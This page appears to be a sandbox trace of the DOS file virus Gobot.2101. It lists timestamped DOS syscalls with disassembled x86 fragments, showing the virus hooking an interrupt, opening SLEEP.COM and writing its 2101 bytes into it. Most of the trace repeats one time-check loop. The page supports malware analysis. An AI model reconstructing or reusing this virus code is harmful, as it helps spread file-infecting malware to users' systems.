Sample viewer

vx.netlux.org/Virus.DOS.Gobot.2101

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:05:08.169668287Z 53 PC: 12a56 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T23:05:08.171081754Z 37 PC: 12a66 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T23:05:08.172870257Z 78 PC: 12a75 | Find first file
2018-12-17T23:05:08.179039311Z 61 PC: 12a7f | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:05:08.194918983Z 63 PC: 12a8a | Read file or device (Read 2 bytes on handle 5)
2018-12-17T23:05:08.202503709Z 44 PC: 12ade | Get time 0x12ade: xor dh, dh
0x12ae0: and dl, 7
0x12ae3: cmp dx, 6
0x12ae7: jg 0x12ada
0x12ae9: push dx
0x12aea: add dx, 0x730
0x12aee: mov si, dx
0x12af0: mov dl, byte ptr cs:[si]
0x12af3: mov byte ptr [0x103], dl
0x12af7: pop dx
0x12af8: push dx
0x12af9: add dx, 0x745
0x12afd: mov si, dx
0x12aff: mov dl, byte ptr cs:[si]
0x12b02: mov byte ptr [0x100], dl
0x12b06: mov ah, 0x2c
0x12b08: int 0x21
0x12b0a: xor dh, dh
0x12b0c: and dl, 7
0x12b0f: cmp dx, 6
2018-12-17T23:05:08.20523027Z 44 PC: 12b0a | Get time 0x12b0a: xor dh, dh
0x12b0c: and dl, 7
0x12b0f: cmp dx, 6
0x12b13: jg 0x12b06
0x12b15: pop ax
0x12b16: push ax
0x12b17: cmp ax, dx
0x12b19: je 0x12b06
0x12b1b: pop ax
0x12b1c: push dx
0x12b1d: add dx, 0x737
0x12b21: mov si, dx
0x12b23: mov dl, byte ptr cs:[si]
0x12b26: mov byte ptr [0x104], dl
0x12b2a: pop dx
0x12b2b: add dx, 0x73e
0x12b2f: mov si, dx
0x12b31: mov dl, byte ptr cs:[si]
0x12b34: mov byte ptr [0x106], dl
0x12b38: mov ax, 0x4200
2018-12-17T23:05:08.208725021Z 44 PC: 12b0a | Get time 0x12b0a: xor dh, dh
0x12b0c: and dl, 7
0x12b0f: cmp dx, 6
0x12b13: jg 0x12b06
0x12b15: pop ax
0x12b16: push ax
0x12b17: cmp ax, dx
0x12b19: je 0x12b06
0x12b1b: pop ax
0x12b1c: push dx
0x12b1d: add dx, 0x737
0x12b21: mov si, dx
0x12b23: mov dl, byte ptr cs:[si]
0x12b26: mov byte ptr [0x104], dl
0x12b2a: pop dx
0x12b2b: add dx, 0x73e
0x12b2f: mov si, dx
0x12b31: mov dl, byte ptr cs:[si]
0x12b34: mov byte ptr [0x106], dl
0x12b38: mov ax, 0x4200
2018-12-17T23:05:08.211687471Z 44 PC: 12b0a | Get time 0x12b0a: xor dh, dh
0x12b0c: and dl, 7
0x12b0f: cmp dx, 6
0x12b13: jg 0x12b06
0x12b15: pop ax
0x12b16: push ax
0x12b17: cmp ax, dx
0x12b19: je 0x12b06
0x12b1b: pop ax
0x12b1c: push dx
0x12b1d: add dx, 0x737
0x12b21: mov si, dx
0x12b23: mov dl, byte ptr cs:[si]
0x12b26: mov byte ptr [0x104], dl
0x12b2a: pop dx
0x12b2b: add dx, 0x73e
0x12b2f: mov si, dx
0x12b31: mov dl, byte ptr cs:[si]
0x12b34: mov byte ptr [0x106], dl
0x12b38: mov ax, 0x4200
2018-12-17T23:05:08.214829209Z 44 PC: 12b0a | Get time 0x12b0a: xor dh, dh
0x12b0c: and dl, 7
0x12b0f: cmp dx, 6
0x12b13: jg 0x12b06
0x12b15: pop ax
0x12b16: push ax
0x12b17: cmp ax, dx
0x12b19: je 0x12b06
0x12b1b: pop ax
0x12b1c: push dx
0x12b1d: add dx, 0x737
0x12b21: mov si, dx
0x12b23: mov dl, byte ptr cs:[si]
0x12b26: mov byte ptr [0x104], dl
0x12b2a: pop dx
0x12b2b: add dx, 0x73e
0x12b2f: mov si, dx
0x12b31: mov dl, byte ptr cs:[si]
0x12b34: mov byte ptr [0x106], dl
0x12b38: mov ax, 0x4200
2018-12-17T23:05:08.217928441Z 44 PC: 12b0a | Get time 0x12b0a: xor dh, dh
0x12b0c: and dl, 7
0x12b0f: cmp dx, 6
0x12b13: jg 0x12b06
0x12b15: pop ax
0x12b16: push ax
0x12b17: cmp ax, dx
0x12b19: je 0x12b06
0x12b1b: pop ax
0x12b1c: push dx
0x12b1d: add dx, 0x737
0x12b21: mov si, dx
0x12b23: mov dl, byte ptr cs:[si]
0x12b26: mov byte ptr [0x104], dl
0x12b2a: pop dx
0x12b2b: add dx, 0x73e
0x12b2f: mov si, dx
0x12b31: mov dl, byte ptr cs:[si]
0x12b34: mov byte ptr [0x106], dl
0x12b38: mov ax, 0x4200
2018-12-17T23:05:08.221867265Z 44 PC: 12b0a | Get time 0x12b0a: xor dh, dh
0x12b0c: and dl, 7
0x12b0f: cmp dx, 6
0x12b13: jg 0x12b06
0x12b15: pop ax
0x12b16: push ax
0x12b17: cmp ax, dx
0x12b19: je 0x12b06
0x12b1b: pop ax
0x12b1c: push dx
0x12b1d: add dx, 0x737
0x12b21: mov si, dx
0x12b23: mov dl, byte ptr cs:[si]
0x12b26: mov byte ptr [0x104], dl
0x12b2a: pop dx
0x12b2b: add dx, 0x73e
0x12b2f: mov si, dx
0x12b31: mov dl, byte ptr cs:[si]
0x12b34: mov byte ptr [0x106], dl
0x12b38: mov ax, 0x4200
2018-12-17T23:05:08.226896005Z 44 PC: 12b0a | Get time 0x12b0a: xor dh, dh
0x12b0c: and dl, 7
0x12b0f: cmp dx, 6
0x12b13: jg 0x12b06
0x12b15: pop ax
0x12b16: push ax
0x12b17: cmp ax, dx
0x12b19: je 0x12b06
0x12b1b: pop ax
0x12b1c: push dx
0x12b1d: add dx, 0x737
0x12b21: mov si, dx
0x12b23: mov dl, byte ptr cs:[si]
0x12b26: mov byte ptr [0x104], dl
0x12b2a: pop dx
0x12b2b: add dx, 0x73e
0x12b2f: mov si, dx
0x12b31: mov dl, byte ptr cs:[si]
0x12b34: mov byte ptr [0x106], dl
0x12b38: mov ax, 0x4200
2018-12-17T23:05:08.230954652Z 44 PC: 12b0a | Get time 0x12b0a: xor dh, dh
0x12b0c: and dl, 7
0x12b0f: cmp dx, 6
0x12b13: jg 0x12b06
0x12b15: pop ax
0x12b16: push ax
0x12b17: cmp ax, dx
0x12b19: je 0x12b06
0x12b1b: pop ax
0x12b1c: push dx
0x12b1d: add dx, 0x737
0x12b21: mov si, dx
0x12b23: mov dl, byte ptr cs:[si]
0x12b26: mov byte ptr [0x104], dl
0x12b2a: pop dx
0x12b2b: add dx, 0x73e
0x12b2f: mov si, dx
0x12b31: mov dl, byte ptr cs:[si]
0x12b34: mov byte ptr [0x106], dl
0x12b38: mov ax, 0x4200
2018-12-17T23:05:08.234460671Z 44 PC: 12b0a | Get time 0x12b0a: xor dh, dh
0x12b0c: and dl, 7
0x12b0f: cmp dx, 6
0x12b13: jg 0x12b06
0x12b15: pop ax
0x12b16: push ax
0x12b17: cmp ax, dx
0x12b19: je 0x12b06
0x12b1b: pop ax
0x12b1c: push dx
0x12b1d: add dx, 0x737
0x12b21: mov si, dx
0x12b23: mov dl, byte ptr cs:[si]
0x12b26: mov byte ptr [0x104], dl
0x12b2a: pop dx
0x12b2b: add dx, 0x73e
0x12b2f: mov si, dx
0x12b31: mov dl, byte ptr cs:[si]
0x12b34: mov byte ptr [0x106], dl
0x12b38: mov ax, 0x4200
2018-12-17T23:05:08.240812577Z 44 PC: 12b0a | Get time 0x12b0a: xor dh, dh
0x12b0c: and dl, 7
0x12b0f: cmp dx, 6
0x12b13: jg 0x12b06
0x12b15: pop ax
0x12b16: push ax
0x12b17: cmp ax, dx
0x12b19: je 0x12b06
0x12b1b: pop ax
0x12b1c: push dx
0x12b1d: add dx, 0x737
0x12b21: mov si, dx
0x12b23: mov dl, byte ptr cs:[si]
0x12b26: mov byte ptr [0x104], dl
0x12b2a: pop dx
0x12b2b: add dx, 0x73e
0x12b2f: mov si, dx
0x12b31: mov dl, byte ptr cs:[si]
0x12b34: mov byte ptr [0x106], dl
0x12b38: mov ax, 0x4200
2018-12-17T23:05:08.247200541Z 44 PC: 12b0a | Get time 0x12b0a: xor dh, dh
0x12b0c: and dl, 7
0x12b0f: cmp dx, 6
0x12b13: jg 0x12b06
0x12b15: pop ax
0x12b16: push ax
0x12b17: cmp ax, dx
0x12b19: je 0x12b06
0x12b1b: pop ax
0x12b1c: push dx
0x12b1d: add dx, 0x737
0x12b21: mov si, dx
0x12b23: mov dl, byte ptr cs:[si]
0x12b26: mov byte ptr [0x104], dl
0x12b2a: pop dx
0x12b2b: add dx, 0x73e
0x12b2f: mov si, dx
0x12b31: mov dl, byte ptr cs:[si]
0x12b34: mov byte ptr [0x106], dl
0x12b38: mov ax, 0x4200
2018-12-17T23:05:08.261911881Z 44 PC: 12b0a | Get time 0x12b0a: xor dh, dh
0x12b0c: and dl, 7
0x12b0f: cmp dx, 6
0x12b13: jg 0x12b06
0x12b15: pop ax
0x12b16: push ax
0x12b17: cmp ax, dx
0x12b19: je 0x12b06
0x12b1b: pop ax
0x12b1c: push dx
0x12b1d: add dx, 0x737
0x12b21: mov si, dx
0x12b23: mov dl, byte ptr cs:[si]
0x12b26: mov byte ptr [0x104], dl
0x12b2a: pop dx
0x12b2b: add dx, 0x73e
0x12b2f: mov si, dx
0x12b31: mov dl, byte ptr cs:[si]
0x12b34: mov byte ptr [0x106], dl
0x12b38: mov ax, 0x4200
2018-12-17T23:05:08.264857553Z 44 PC: 12b0a | Get time 0x12b0a: xor dh, dh
0x12b0c: and dl, 7
0x12b0f: cmp dx, 6
0x12b13: jg 0x12b06
0x12b15: pop ax
0x12b16: push ax
0x12b17: cmp ax, dx
0x12b19: je 0x12b06
0x12b1b: pop ax
0x12b1c: push dx
0x12b1d: add dx, 0x737
0x12b21: mov si, dx
0x12b23: mov dl, byte ptr cs:[si]
0x12b26: mov byte ptr [0x104], dl
0x12b2a: pop dx
0x12b2b: add dx, 0x73e
0x12b2f: mov si, dx
0x12b31: mov dl, byte ptr cs:[si]
0x12b34: mov byte ptr [0x106], dl
0x12b38: mov ax, 0x4200
2018-12-17T23:05:08.266959553Z 44 PC: 12b0a | Get time 0x12b0a: xor dh, dh
0x12b0c: and dl, 7
0x12b0f: cmp dx, 6
0x12b13: jg 0x12b06
0x12b15: pop ax
0x12b16: push ax
0x12b17: cmp ax, dx
0x12b19: je 0x12b06
0x12b1b: pop ax
0x12b1c: push dx
0x12b1d: add dx, 0x737
0x12b21: mov si, dx
0x12b23: mov dl, byte ptr cs:[si]
0x12b26: mov byte ptr [0x104], dl
0x12b2a: pop dx
0x12b2b: add dx, 0x73e
0x12b2f: mov si, dx
0x12b31: mov dl, byte ptr cs:[si]
0x12b34: mov byte ptr [0x106], dl
0x12b38: mov ax, 0x4200
2018-12-17T23:05:08.26904244Z 44 PC: 12b0a | Get time 0x12b0a: xor dh, dh
0x12b0c: and dl, 7
0x12b0f: cmp dx, 6
0x12b13: jg 0x12b06
0x12b15: pop ax
0x12b16: push ax
0x12b17: cmp ax, dx
0x12b19: je 0x12b06
0x12b1b: pop ax
0x12b1c: push dx
0x12b1d: add dx, 0x737
0x12b21: mov si, dx
0x12b23: mov dl, byte ptr cs:[si]
0x12b26: mov byte ptr [0x104], dl
0x12b2a: pop dx
0x12b2b: add dx, 0x73e
0x12b2f: mov si, dx
0x12b31: mov dl, byte ptr cs:[si]
0x12b34: mov byte ptr [0x106], dl
0x12b38: mov ax, 0x4200
2018-12-17T23:05:08.272919631Z 66 PC: 12b41 | Move file pointer
2018-12-17T23:05:08.274498462Z 44 PC: 12b46 | Get time 0x12b46: mov word ptr [0x931], dx
0x12b4a: mov si, 0x2db
0x12b4d: mov di, 0x939
0x12b50: mov cx, 0x1a
0x12b53: rep movsb byte ptr es:[di], byte ptr [si]
0x12b55: call 0x13279
0x12b58: mov ah, 0x3e
0x12b5a: int 0x21
0x12b5c: mov ah, 9
0x12b5e: mov dx, 0x74c
0x12b61: int 0x21
0x12b63: int 0x20
0x12b65: mov ah, 0xf
0x12b67: int 0x10
0x12b69: xor ah, ah
0x12b6b: int 0x10
0x12b6d: mov ah, 1
0x12b6f: mov cx, 0x2607
0x12b72: int 0x10
0x12b74: mov ax, 0xb800
2018-12-17T23:05:08.277281111Z 64 PC: 1328b | Write file or device (Write 2101 bytes on handle 5)
2018-12-17T23:05:08.311717966Z 62 PC: 12b5c | Close file
2018-12-17T23:05:08.320524783Z 9 PC: 12b63 | Display string (String= 'Parameter value not in allowed range ')